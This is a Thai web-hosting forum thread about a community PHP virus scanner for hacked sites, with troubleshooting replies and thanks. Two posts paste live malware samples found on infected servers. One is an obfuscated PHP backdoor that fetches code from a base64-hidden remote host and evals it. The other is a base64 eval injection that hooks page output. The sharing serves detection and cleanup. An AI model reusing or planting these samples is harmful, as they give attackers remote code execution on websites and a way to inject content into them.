↑ เหอๆ

เจ๋งสุดๆ

แวะมาบอก แต่เดี๋ยวไมไ่ด้ทำต่อ ต้องปั่นงานคงค้าง
อันนี้เร็วกว่า
$ext = end(explode(".", $file));
if (in_array($ext, $config['filetype'])) {
//echo "$file\n";

}

อันนี้ช้ากว่า
$regex = "#\.(" . implode("|", $config['filetype']) . ")$#i";
if (preg_match($regex, $file, $tmp)) {
//echo "$file\n";

}

สรุป ไม่ว่าจะยังไง Regex ก็อืดกว่าจริงๆ
แม้ต่างกันในระดับมิลลิวินาที แต่ถ้าจำนวนไฟล์มากๆ ก็จะทำให้เห็นผลชัดขึ้น

เดี๋ยวต้องขอไปทำงานก่อน อาจเป็นพรุ่งนี้ัถึงจะมาทำเวอร์ใหม่ให้
แล้วก็ ตอนนี้ยังไม่มีใครส่งโค้ดที่เป็นไวรัสมาให้เลย

หรือใครเจอไวรัส ถ้าเจอผมออนเอ็ม ก็เข้ามาคุยกันได้นะ  :

โค้ดที่เคยโดนเป็นอันนี้อ่ะ

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6b5c989d96a8617d098f67be813b4c3b") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

กระทู็ที่เคยตั้งไว้ตอนโดน
http://www.thaiseoboard.com/index.php/topic,57742.msg715055.html#msg715055

ปัจจุบันหลังจากCHMOD 644 ทุกไฟล์ ทุก DIR มันก็หายไปละ ไม่รู้ว่ามันมาจากไหน

ปัญหาคือ เวลาบอทมันเ้ข้ามาเว็บ ถ้าเจอไฟล์รูปใน DIR ที่มีไฟล์นั้นอยู่ จะถูก Redirect ไปยังหน้าที่มันสร้างขึ้น แล้วก็ เด้งต่อไปหน้าเว็บของมัน

เยี่ยมไปเลย +1 ให้อีกคน

ผมมีนะครับ เดี๋ยวส่งให้ ไปขอ ftp จากลูกค้าอีกทีนึงก่อนครับ

Thanks ครับ

แหล่มเลยครับ ขนาดผมว่าผมพอจะรู้เรื่อง php บ้าง แต่ดู code แล้ว เทพมากๆ
ขอบคุณครับ

อ่อ สนับสนุน ทำเป็น ajax ครับ เพราะไฟล์เยอะๆ มันรันนานจนลืมไปเลย

มาดันกระทู้ค่ะ เหนว่ามีคนโดนเพิ่ม เผื่อกำลังหาทางแก้ไวรัสอยู่ 

เห็นเมื่อคืนถามถึง image.php  ไม่รู้ว่ามีกระทู้นี้อ่ะ   

สุดๆเพิ่งโดนเบื่อบ่ายหมาดๆหายแว๊วว ขอบคุณครับ

ขอบคุณมากเลยครับ อยากจะสอบถามว่ามันใช้กับโฮสของไทยที่ใช้ Direct Admin ได้ด้วยไหมครับ ผมลองรันดูแล้วมันขึ้น error บรรทัดที่ 94 นะครับ

ขอบคุณครับ

อ้างถึงจาก: PIN ใน 09 พฤษภาคม 2009, 16:02:51
ขอบคุณมากเลยครับ อยากจะสอบถามว่ามันใช้กับโฮสของไทยที่ใช้ Direct Admin ได้ด้วยไหมครับ ผมลองรันดูแล้วมันขึ้น error บรรทัดที่ 94 นะครับ

ขอบคุณครับ

ใช้ได้ไม่มีปัญหาคับ

ของผมมันขึ้นประมาณนี้ครับ


Warning: Invalid argument supplied for foreach() in /home/micronfan/domains/xxxxxxxxx.com/public_html/virusscan.php on line 80

Warning: Invalid argument supplied for foreach() in /home/micronfan/domains/xxxxxxxxxxx.com/public_html/virusscan.php on line 94

ใครเจอ error อะไรก็แจ้งเข้ามานะครับ

พอดีช่วงนี้งานเข้าเยอะแยะ แถมอยู่ช่วงสอบปลายภาคด้วย
ผมเรียนภาคพิเศษ เวลาสอบมันไม่เหมือนชาวบ้าน

เวลามันเลยอยู่ในช่วงหัวหกก้นขวิด งานยังไล่ขวิดเ็ป็นระยะๆ

แล้วเตือนสำหรับคนใช้โค้ดของบอร์ดใต้ดิน (ไม่ขอเอ่ย ฐานะรู้กัน เพราะคนทำไม่อยากให้พูดถึง)
อย่านำสคริปนี้ไปใช้นะครับ มันยังมีบั๊กที่ผมเองยังหาแก้ปัญหาไม่ได้
บอกตามตรง งงว่าเพราะอะไร มึนถึงเป็น

Parse error: syntax error, unexpected '(' in /home/----------------- : eval()'d code on line 1
เพราะใช้ความสามารถพิเศษ คือแปลงร่างตัวเองเป็น interpreter ก็ยังหา error ไม่เจอ
ลองเรียกโดดๆ ก็ไม่ error
แต่เรียก include กลับเจอ พอตรวจไฟล์ที่มี include กลับไม่เจอ

เล่นเอางงมากมาย 

เพิ่งโดนที่ดรีมโฮส ขอบคุณน้องโจ้มากคับ  :

ของผมเจอที่มันเขียนโค๊ดเพิ่มส่วนหัวของไฟล์ index.php อ่ะ เซงมากไม่รู้ติดมาได้ไง

พอใช้โปรแกรมรัน เจอ 200 ไฟล์ เห้อ

ขอบคุณมากๆเลยนะครับ  ไม่ทราบว่าถ้าคลีนแล้ว มันจะกลับมาอีกไหม กลัวๆ 

ผมลองสแกนดูโอสผมสองโดเมนเจอโดเมนละ 5-6 ไฟล์แต่ไม่มีชื่อบอก เลยลองไปแก้ code ดูตรงบรรทัด


146 echo '<script>status.innerHTML="Scaning Complete!";</script>
พบทั้งหมด '.count($list).' ไฟล์';
if(count($list) == 0) die();

[color=red] foreach($list as $l){
echo 'Virus found in '.$l.'<br>';
152 }[/color]


ลองรันใหม่ผลที่ได้คือ

อ้างถึงบลาๆๆๆ ....
พบทั้งหมด 6 ไฟล์Virus found in /home/xxxxxx/public_html/wp-content/plugins/XxxxxxXXXX/js/jquery-ui-1.7.1.custom.min.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/tiny_mce.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/media/editor_plugin.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/paste/editor_plugin.js
Virus found in /home/xxxxxx/public_html/wp-includes/js/tinymce/plugins/safari/editor_plugin.js

ผมลองส่องดูสามไฟล์แรกมันก็เป็นไฟล์จาวาสคริปธรรมดาของ wordpress นะครับ

ปล. แก้ไขลืมลบคำสำคัญ

ผมลองให้มันทำงานตรวจดูไฟล์ที่ผมโดนมันบอกไม่มีไฟล์มีปัญหาทั้งๆที่ไฟล์มีปัญหายังอยู่ดีไม่โดนกำจัดเลยอ่ะครับ
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9ra2xmb3J1bS9kb21haW5zL2ZvcnVtLmtob25rYWVubGluay5pbmZvL3B1YmxpY19odG1sL1RoZW1lcy9ra2xtYXJrZXQvaW1hZ2VzL29uLW9uMi1vZmYvMDEvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2trbGZvcnVtL2RvbWFpbnMvZm9ydW0ua2hvbmthZW5saW5rLmluZm8vcHVibGljX2h0bWwvVGhlbWVzL2trbG1hcmtldC9pbWFnZXMvb24tb24yLW9mZi8wMS9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

ผมแก้โค้ดใหม่ยกระบบแล้วนะครับ
และปิดโค้ดส่วนที่ตรวจ backdoor ของ gumblar.cn

เพราะจริงๆ มันมีส่วนของ eval base64
ซึ่งมานั่งนึกก็จะเห็นพวกเทมเพลต wordpress หลายตัวก็ใช้
เพราะคนทำเทมเพลตอยากจะใส่เครดิตไม่ให้แก้
แต่ถ้าลบดื้ๆ เทมก็พัง

ตอนนี้ระบบเป็น AJAX ล้วนๆ โหลดเซฟรัน ไม่ต้องการไฟล์ภายนอก
เพราะยัดลงไปกับตัว php แล้ว ไฟล์เลยบวมมานิดหน่อย

แก้หลายเรื่อง เช่น หลายคนอยากรู้ไฟล์ไหนที่เป็นปัญหา งานนี้แสดงตัวแดงชัดๆ
เห็นชื่อไฟล์หมด ถ้าเจอโค้ดก็จะบอกว่าเจอกี่จุด
แก้ส่วน core เช่นไม่ต้องเขียนทับในไฟล์ที่ไม่มีปัญหา (แก้ไอ้ตรงนี้ ระบบเบาขึ้น)
แต่ส่วนที่เลี่ยงไม่ได้ คือ preg ที่ยังต้องใช้
แต่ให้เทียบตอนนี้ใช้ ajax และรันซอยถี่ทีละไฟล์

ส่วนใครอยากแก้เรื่อง delay การเรียกระหว่างไฟล์ ให้หา
var delay = 500;
หน่วยเป็นมิลลิวินาที
ดังนั้นอยากแก้เป็น 2 วิ ก็ใส่ 2000

ต้องการ Request อะไรก็บอกมานะครับ

ปล. งานนี้ประชดคนใช้โดยเขียนภายใต้ error_reporting(E_ALL);
ดังนั้นถ้ามี Error ก็บอกมานะครับ (ไอ้ตรงประชดนี้ ล้อเล่นนะครับ  )

ปล2. ช่วงนี้ปิดเทอมเลยปั่นงานกระจาย เวลาเข้าบอร์ดยังน้อยลงเลยครับ ToT

ขอบคุณน้องโจ้มากเลยครับ